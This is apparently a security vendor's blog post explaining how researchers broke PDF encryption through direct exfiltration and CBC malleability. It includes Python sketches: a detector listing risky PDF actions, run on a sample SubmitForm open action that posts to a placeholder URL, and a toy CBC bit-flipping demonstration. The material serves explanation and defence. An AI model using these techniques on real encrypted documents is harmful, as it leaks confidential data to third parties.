According to the file format’s specifications, PDF supports encryption, using the AES algorithm with Cipher Block Chaining encryption mode. Therefore — at least, in theory — whoever encrypts a PDF file can be sure that only someone who has the password can see what’s in the file. Continuing the study of PDF security, a team of researchers from several German universities tested how reliable the encryption implementation in this format is. Fabian Ising of Münster University of Applied Sciences presented their conclusions — and they were disappointing.
Companies typically use encrypted PDFs to transfer data through an unsecured or untrusted channel, for example, to upload a file to cloud storage that many people have access to. The researchers were looking for a way to modify the encrypted file so that, once the recipient entered the password, the information in the PDF would be sent to a third party without any visible change alerting the recipient.
The researchers developed two attack concepts that let them give a third party access to the encrypted content. The first attack (direct exfiltration) requires no special cryptography skills, only an understanding of the PDF format specifications. The researchers called it “hacking cryptography without touching cryptography.” The second attack, called a malleability attack, is more complicated and requires an understanding of Cipher Block Chaining mode.
Who uses encrypted PDFs, and why?
Businesses find many uses for encrypted PDFs.
- Banks use them for confidentiality when exchanging documents with customers.
- Multifunction printers (MFPs) can send scanned documents by e-mail, password-protecting the PDFs if the sender selects the “in encrypted form” option.
- Medical diagnostic devices use secure PDFs to send test results to patients or medics.
- Government agencies such as the US Department of Justice accept incoming documents as encrypted PDFs.
A number of e-mail application plugins provide the ability to send a document as an encrypted PDF, so a demand for the option clearly exists.
Direct exfiltration attack
Encrypting a PDF file encrypts the content only (i.e., objects in the file, which are characterized as either strings or streams). The remaining objects, which determine the structure of the document, remain unencrypted. In other words, anyone can still find out the number and size of pages, objects, and links without the password. Leaving that information exposed gives potential attackers material they can use to engineer a way around the encryption.
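To illustrate how much structure stays readable, here is a minimal Python sketch that counts indirect objects and page objects in raw PDF bytes without any password. The function name `structure_summary`, the regular expressions, and the `SAMPLE` bytes are assumptions made for illustration, not part of the researchers’ tooling. The sketch sees only structure stored outside of streams, so a real file may reveal less than this toy example does.

```python
import re

# Hypothetical helper: summarize structure visible without a password.
OBJ_RE = re.compile(rb"\b\d+\s+\d+\s+obj\b")           # "12 0 obj" headers
PAGE_RE = re.compile(rb"/Type\s*/Page(?![A-Za-z])")     # /Page, but not /Pages
BOX_RE = re.compile(
    rb"/MediaBox\s*\[\s*([-\d.]+)\s+([-\d.]+)\s+([-\d.]+)\s+([-\d.]+)\s*\]"
)

def structure_summary(data: bytes) -> dict:
    """Count objects and pages and list page sizes found in raw bytes."""
    boxes = [tuple(float(v) for v in m.groups()) for m in BOX_RE.finditer(data)]
    return {
        "objects": len(OBJ_RE.findall(data)),
        "pages": len(PAGE_RE.findall(data)),
        "media_boxes": boxes,
    }

# Made-up sample: the stream body stands in for encrypted content,
# while the dictionaries around it remain readable.
SAMPLE = (
    b"%PDF-1.7\n"
    b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
    b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n"
    b"3 0 obj\n<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792]"
    b" /Contents 4 0 R >>\nendobj\n"
    b"4 0 obj\n<< /Length 16 >>\nstream\n"
    + b"\x9c\x1f\xa7\x03" * 4
    + b"\nendstream\nendobj\n"
)

summary = structure_summary(SAMPLE)
print(summary)
```

Even though the stream body is opaque, the object count, page count, and page dimensions are all recoverable from the surrounding plaintext.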
The researchers first wondered whether they could add their own information to the file, which in theory would let them build an exfiltration channel. They learned from the format documentation that PDFs allow granular control over encryption such that, for example, you can encrypt only objects of type “string” or only objects of type “stream,” leaving other content unencrypted.
Moreover, no integrity checks are implemented, so if you add something to an encrypted document, users won’t be alerted. That “something” might include a submit-form action function, which means you could embed a form in a PDF file that sends data — for example, the entire contents of the document — to a third party. The function can be tied to an action such as opening the document, too.
The above is simply one example of exfiltration, but options abound. Attackers might place a simple link to their site with the entire contents of the file added to the URL. Or they could use JavaScript to send the decrypted contents anywhere. Of course, some PDF readers double-check with the user before communicating with a website, but not all of them — and not every user will think before allowing it.
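From the defender’s side, the channels described above all rely on a handful of PDF name tokens that sit in the unencrypted part of the file. The following is a rough Python heuristic, not a complete detector, that counts such tokens in raw bytes. The name list, the function `find_active_content`, and the sample bytes are assumptions chosen for illustration; the sketch ignores names hidden in compressed object streams or written with `#xx` escapes, and a hit does not prove tampering, since legitimate forms and links use the same names.

```python
import re

# Illustrative, non-exhaustive list of names that can trigger
# network access or scripting when a document is opened or used.
SUSPICIOUS_NAMES = (
    b"OpenAction", b"AA", b"SubmitForm", b"URI",
    b"JavaScript", b"JS", b"Launch", b"GoToR",
)

def find_active_content(data: bytes) -> dict[str, int]:
    """Return how often each suspicious name token occurs in the raw bytes."""
    hits = {}
    for name in SUSPICIOUS_NAMES:
        # Match "/Name" only when it is not a prefix of a longer name.
        pattern = re.compile(rb"/" + re.escape(name) + rb"(?![A-Za-z0-9])")
        count = len(pattern.findall(data))
        if count:
            hits[name.decode("ascii")] = count
    return hits

# Made-up fragment resembling a catalog with a form-submitting open action.
SAMPLE = (
    b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /AcroForm 5 0 R\n"
    b"   /OpenAction << /S /SubmitForm /F (https://example.invalid/collect) >> >>\n"
    b"endobj\n"
)

hits = find_active_content(SAMPLE)
print(hits)
```

A check like this could flag an encrypted file for manual review before anyone types in the password, but it is no substitute for a viewer that asks before contacting a remote site.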
Malleability attack
The second attack on PDF encryption employs a known drawback of Cipher Block Chaining (CBC) mode, which lacks integrity control. The essence of this well-known attack is that an attacker who knows part of the plaintext that was encrypted can change the contents of a block without knowing the key.
According to the PDF format specifications, whenever content in a PDF file is encrypted, the document’s permissions are encrypted as well (for example, giving the author the ability to edit the document and denying a simple reader the ability to do so). The intent was to prevent attackers from tampering with permissions, which are encrypted with the same AES key as the rest of the document.
At the same time, those permissions are also stored in the file in unencrypted form. That means attackers know the plaintext of 12 encrypted bytes by default, and as a result, they can tamper with Cipher Block Chaining to target and manipulate encrypted data, for example, adding a data exfiltration mechanism to the encrypted file that sends its contents to a third-party site.
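The underlying CBC property can be shown in a few lines of Python. This is a sketch under loud assumptions: the block cipher below is a toy Feistel construction built from SHA-256 that merely stands in for AES (it is not AES and not secure), and the key, IV, and messages are made up. It does not model PDF specifics such as the permissions entry; it only demonstrates that in CBC mode, XORing the preceding block (here the IV) with `known XOR target` turns a known plaintext block into one the attacker chooses, with no key required.

```python
import hashlib

BLOCK = 16          # block size in bytes, the same as AES
HALF = BLOCK // 2

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key: bytes, i: int, half: bytes) -> bytes:
    # Round function of the toy Feistel cipher (a stand-in, NOT AES).
    return hashlib.sha256(key + bytes([i]) + half).digest()[:HALF]

def encrypt_block(key: bytes, block: bytes) -> bytes:
    left, right = block[:HALF], block[HALF:]
    for i in range(4):
        left, right = right, _xor(left, _round(key, i, right))
    return left + right

def decrypt_block(key: bytes, block: bytes) -> bytes:
    left, right = block[:HALF], block[HALF:]
    for i in reversed(range(4)):
        left, right = _xor(right, _round(key, i, left)), left
    return left + right

def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    assert len(plaintext) % BLOCK == 0, "demo skips padding"
    out, prev = [], iv
    for i in range(0, len(plaintext), BLOCK):
        prev = encrypt_block(key, _xor(plaintext[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(ciphertext), BLOCK):
        block = ciphertext[i:i + BLOCK]
        out.append(_xor(decrypt_block(key, block), prev))
        prev = block
    return b"".join(out)

# Victim side: encrypt two blocks; the attacker knows the first one.
key = b"demo key, not a real secret"
iv = bytes(range(BLOCK))
known = b"KNOWN-PLAINTEXT!"      # 16 bytes the attacker already knows
secret = b"rest of the file"     # 16 bytes the attacker does not know
ciphertext = cbc_encrypt(key, iv, known + secret)

# Attacker side: no key needed, only the IV and the known block.
target = b"ATTACKER-CHOSEN!"
forged_iv = _xor(iv, _xor(known, target))

# Victim decrypts the tampered data and gets the attacker's block.
tampered = cbc_decrypt(key, forged_iv, ciphertext)
print(tampered)
```

Because nothing authenticates the ciphertext, the decrypting side has no way to notice the change; an authenticated mode would reject the forged input instead of returning attacker-chosen plaintext.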
Results
The researchers tested their methods on 23 PDF readers and 4 browsers. They found each of them at least partially vulnerable to at least one of these attacks.
Unfortunately, no client-side solution can fully mitigate the format’s weakness. It is not possible to block all exfiltration channels without crippling the format. The researchers reported the problems to software developers, and some of the companies, including Apple, tried to help by making the notification that a file is accessing a third-party site more prominent. Others said they’d tried but couldn’t “fix the unfixable.”
Our recommendation if you need to transmit confidential data is to use an alternative method of securing that information. For example, you can use our solutions to create encrypted containers.